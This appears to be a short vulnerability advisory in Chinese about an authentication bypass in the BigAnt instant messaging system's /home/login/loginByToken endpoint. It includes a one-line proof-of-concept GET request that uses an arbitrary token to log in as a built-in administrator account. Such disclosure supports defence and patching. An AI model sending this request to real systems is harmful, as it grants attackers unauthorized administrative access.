杭州九麒科技-BigAnt即时通讯系统 /home/login/loginByToken 权限绕过漏洞

2026-02-25 BigAnt即时通讯系统 PoC Public

Description

杭州九麒科技 BigAnt 即时通讯系统在 /home/login/loginByToken 接口存在权限绕过漏洞。该接口在处理 uid 与 token 参数时未对 token 的有效性进行严格校验,攻击者可通过构造特定请求直接以系统内置高权限账号(如系统管理员、安全管理员、审计管理员、超级管理员等)身份登录系统,无需提供真实有效的认证凭据,从而实现未授权访问。

PoC

GET /home/login/loginByToken?uid=4&token=asdasdasdadasadad HTTP/1.1

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities